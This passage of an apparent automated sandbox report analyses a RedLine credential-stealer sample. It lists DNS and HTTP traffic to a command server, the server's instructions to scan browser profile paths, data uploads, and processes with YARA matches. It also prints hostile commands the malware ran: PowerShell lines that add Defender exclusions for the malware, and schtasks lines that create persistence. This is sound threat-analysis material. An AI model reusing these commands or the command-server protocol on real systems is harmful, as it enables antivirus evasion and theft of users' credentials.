Jun 15, 2024 20:22:33.121628046 CEST	49723	55615	192.168.2.5	45.137.22.67

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 15, 2024 20:22:19.792176008 CEST	61337	53	192.168.2.5	1.1.1.1
Jun 15, 2024 20:22:33.087971926 CEST	52659	53	192.168.2.5	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 15, 2024 20:22:19.792176008 CEST	192.168.2.5	1.1.1.1	0x57cb	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false
Jun 15, 2024 20:22:33.087971926 CEST	192.168.2.5	1.1.1.1	0x1de4	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 15, 2024 20:22:19.799233913 CEST	1.1.1.1	192.168.2.5	0x57cb	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Jun 15, 2024 20:22:33.103152990 CEST	1.1.1.1	192.168.2.5	0x1de4	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

45.137.22.67:55615

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49710	45.137.22.67	55615	8068	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Timestamp	Bytes transferred	Direction	Data
Jun 15, 2024 20:22:13.614931107 CEST	239	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 45.137.22.67:55615 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jun 15, 2024 20:22:14.436089039 CEST	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sat, 15 Jun 2024 18:22:12 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Jun 15, 2024 20:22:19.484477043 CEST	222	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 45.137.22.67:55615 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Jun 15, 2024 20:22:19.746203899 CEST	1236	IN	HTTP/1.1 200 OK Content-Length: 4963 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sat, 15 Jun 2024 18:22:17 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>115.216.239.122</b:string><b:string>113.71.251.160</b:string><b:string>116.23.160.228</b:string><b:string>113.104.182.58</b:string><b:string>36.98.29.146</b:string><b:string>128.90.60.8</b:string></a:BlockedIP><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:s [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49718	45.137.22.67	55615	5404	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe

Timestamp	Bytes transferred	Direction	Data
Jun 15, 2024 20:22:20.564523935 CEST	239	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 45.137.22.67:55615 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jun 15, 2024 20:22:21.384052038 CEST	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sat, 15 Jun 2024 18:22:19 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Jun 15, 2024 20:22:26.497710943 CEST	222	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 45.137.22.67:55615 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Jun 15, 2024 20:22:26.762984037 CEST	1236	IN	HTTP/1.1 200 OK Content-Length: 4963 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sat, 15 Jun 2024 18:22:24 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>115.216.239.122</b:string><b:string>113.71.251.160</b:string><b:string>116.23.160.228</b:string><b:string>113.104.182.58</b:string><b:string>36.98.29.146</b:string><b:string>128.90.60.8</b:string></a:BlockedIP><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:s [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49720	45.137.22.67	55615	8068	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Timestamp	Bytes transferred	Direction	Data
Jun 15, 2024 20:22:22.923113108 CEST	220	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 45.137.22.67:55615 Content-Length: 559666 Expect: 100-continue Accept-Encoding: gzip, deflate
Jun 15, 2024 20:22:24.678530931 CEST	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sat, 15 Jun 2024 18:22:23 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Jun 15, 2024 20:22:24.680370092 CEST	216	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 45.137.22.67:55615 Content-Length: 559658 Expect: 100-continue Accept-Encoding: gzip, deflate
Jun 15, 2024 20:22:25.104408026 CEST	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sat, 15 Jun 2024 18:22:23 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49722	45.137.22.67	55615	5404	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe

Timestamp	Bytes transferred	Direction	Data
Jun 15, 2024 20:22:29.544279099 CEST	220	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 45.137.22.67:55615 Content-Length: 559133 Expect: 100-continue Accept-Encoding: gzip, deflate
Jun 15, 2024 20:22:31.263437033 CEST	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sat, 15 Jun 2024 18:22:29 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49723	45.137.22.67	55615	5404	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe

Timestamp	Bytes transferred	Direction	Data
Jun 15, 2024 20:22:31.272996902 CEST	240	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 45.137.22.67:55615 Content-Length: 559125 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jun 15, 2024 20:22:33.103362083 CEST	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sat, 15 Jun 2024 18:22:31 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Target ID:	0
Start time:	14:21:59
Start date:	15/06/2024
Path:	C:\Users\user\Desktop\w4XFffGDz1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\w4XFffGDz1.exe"
Imagebase:	0x170000
File size:	920'266 bytes
MD5 hash:	2185ECDE5380054AD075B7A25AE0EA51
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:22:01
Start date:	15/06/2024
Path:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Imagebase:	0x600000
File size:	743'944 bytes
MD5 hash:	86F98523CEB67DF5CC3431A839F63134
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs Detection: 58%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:22:08
Start date:	15/06/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Imagebase:	0x8d0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:22:09
Start date:	15/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:22:09
Start date:	15/06/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
Imagebase:	0x8d0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:22:09
Start date:	15/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:22:09
Start date:	15/06/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp"
Imagebase:	0xbb0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:22:09
Start date:	15/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:22:10
Start date:	15/06/2024
Path:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Imagebase:	0xcb0000
File size:	743'944 bytes
MD5 hash:	86F98523CEB67DF5CC3431A839F63134
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.2276292357.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:22:10
Start date:	15/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	14:22:11
Start date:	15/06/2024
Path:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
Imagebase:	0xb00000
File size:	743'944 bytes
MD5 hash:	86F98523CEB67DF5CC3431A839F63134
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 88%, ReversingLabs Detection: 58%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	14:22:11
Start date:	15/06/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:22:18
Start date:	15/06/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp8574.tmp"
Imagebase:	0xbb0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	14:22:18
Start date:	15/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	14:22:18
Start date:	15/06/2024
Path:	C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
Imagebase:	0xac0000
File size:	743'944 bytes
MD5 hash:	86F98523CEB67DF5CC3431A839F63134
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	14:22:18
Start date:	15/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
